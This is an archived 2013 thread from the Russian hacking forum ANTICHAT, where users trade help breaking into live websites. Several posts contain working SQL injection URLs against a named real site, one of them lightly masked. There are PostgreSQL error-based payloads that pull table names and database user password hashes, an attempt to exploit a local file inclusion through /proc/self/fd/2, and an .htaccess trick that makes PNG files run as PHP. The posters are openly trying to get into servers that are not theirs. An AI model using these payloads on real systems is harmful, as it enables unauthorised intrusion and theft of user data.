ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.10.2013, 14:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Относится ли это к скули?
Warning:
Function smartyShowObject() is deprecated in /var/www/сайт/сайт/tools/smarty_v2/compile/%%DE^DEF^DEF53A4D%%search.tpl.php on line 32
in /var/www/сайт/сайт/classes/Tools.php on line 1903
Помогите получить данные
Код:
Code:
http://www.it-kerDELETEch.com.ua/model_list?id=3&mod=1119%27*extractvalue%281,concat_ws%280x27,0x27,%28select%28table_name%29from%28information_schema./*!tables*/%29limit/**/90,1%29%29%29*%27
www.it-kerch.com.ua/model_list?id=3&mod=1119 ' union -- %0A%0D select*from(select 1)a1 join(select version())a2 join(select 3)a3 join(select 4)a4 join(select 5)a5 join(select 6)a6 join(select 7)a7+--+
|
|
|
|
11.10.2013, 20:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
YaBt
Версию я итак знаю 5.1.69-cll-lve
Код:
Code:
http://www.it-kerУДАЛИТЬch.com.ua/model_list?id=3&mod=1119%27*extractvalue%281,concat_ws%280x27,0x27,%28select%28table_name%29from%28information_schema./*!tables*/%29limit/**/90,2%29%29%29*%27
Я имею ввиду перебрать весь лимит от 0,1 до 95,1 и узнать где данные юзеров. Я б и сам перебрал, но у меня SQLMAP не настраивается, я уже и видосы смотрел и мануалы читал.. нефига!
|
|
|
|
13.10.2013, 00:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
782
Репутация:
0
|
|
http://24alco . com /index.php?route=product/special
при переходе выдает ошибку синтаксиса, гляньте спецы!
|
|
|
|
13.10.2013, 02:09
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
В общем, нашел LFI, не получается раскрутить из-за нехватки памяти. Пробую загрузить через уязвимый скрипт /proc/self/fd/2 В ответ получаю:
Сообщение от None
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 13721720 bytes) in /sites/xeksec/forum.example.com/[hidden] on line [hidden]
Понятно, не хватает выделенной в настройках PHP памяти. Есть варианты как-то обойти сие ограничение? |
|
|
13.10.2013, 03:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Ночь добрая!
отправляю:
1'+union+select+1,2,3,4,5,6-- false
выпадает:
Query failed: ERROR: each UNION query must have the same number of columns LINE
отправляю:
'+union+select+1,2,3,4,5-- true
Query failed: ERROR: UNION types timestamp without time zone and integer cannot be matched LINE 3
отправляю:
1'+union+select+1,2,3,4-- false
Query failed: ERROR: each UNION query must have the same number of columns LINE 3
Насколько я понял из статьи:
https://rdot.org
5 столбцов
Решил перепроверить с
'+union+select+null,null,null,null,null-- false
'+union+select+null,null,null,null-- true
Вроде понятно что количество столбцов 5
А как вывести колонку?
Не пинайте первый раз с PostgreSQLмучаюсь |
|
|
|
13.10.2013, 03:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
PostgreSQL не такой демократичный как mysql, типы данных должны совпадать в обеих запросах
во первых если есть вывод ошибок то лучше раскрутить через нее, во вторых можно использовать конвертирование типов, в третьех можно методом тыка найти колонку которая подходит для ваших целей
вобщем читай
/thread35599.html
|
|
|
|
13.10.2013, 03:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
PostgreSQL не такой демократичный как mysql, типы данных должны совпадать в обеих запросах
во первых если есть вывод ошибок то лучше раскрутить через нее, во вторых можно использовать конвертирование типов, в третьех можно методом тыка найти колонку которая подходит для ваших целей
вобщем читай
/thread35599.html
А может есть какой нибудь раскрученный сайтик?
Просто потренироваться....понять!
ух...
Вот таким запросам стал выводить имена)
'+and+1=cast((SELECT+table_name+FROM+information_s chema.tables+LIMIT+1+OFFSET+0)+as+int)--
может кому будет интересно!
А это что за муть:
запрос:
'+and+1=cast((SELECT+usename||chr(58)||passwd+from +pg_user+LIMIT+1+OFFSET+3)+as+int)--
Query failed: ERROR: invalid input syntax for integer: "antoha:********" in
пасс под звездочками...
|
|
|
|
13.10.2013, 14:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
29758
Репутация:
0
|
|
Где-то читал, что при добавлении в png текстового чанка, php выполняет код внутри него. Попробовал добавить
через TweakPNG, поместил в корневую директорию локалхоста, открываю изображение
Код:
Code:
localhost/Basketball.png?cm=mkdir hack
, ищу папку хак, а ее нет. Как делать это правильно? |
|
|
|
13.10.2013, 15:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Сообщение от wanttoask
wanttoask said:
Где-то читал, что при добавлении в png текстового чанка, php выполняет код внутри него. Попробовал добавить
через TweakPNG, поместил в корневую директорию локалхоста, открываю изображение
Код:
Code:
localhost/Basketball.png?cm=mkdir hack
, ищу папку хак, а ее нет. Как делать это правильно? Впринципе ты прав, но нужно чтоб сервер выполнял .png как php =) Это возможно только неправильной(злонамеренно ) настройке сервера, например можешь создать такой файл:
.htaccess
Код:
Code:
AddType application/x-httpd-php .png
Но просто так код в картинке выполняться не будет.
P.S. И у тебя код какой-то неправильный
|
|
|
|
13.10.2013, 15:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
29758
Репутация:
0
|
|
За совет спасибо, но я ведь не смогу на чужом сервере htaccess менять
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
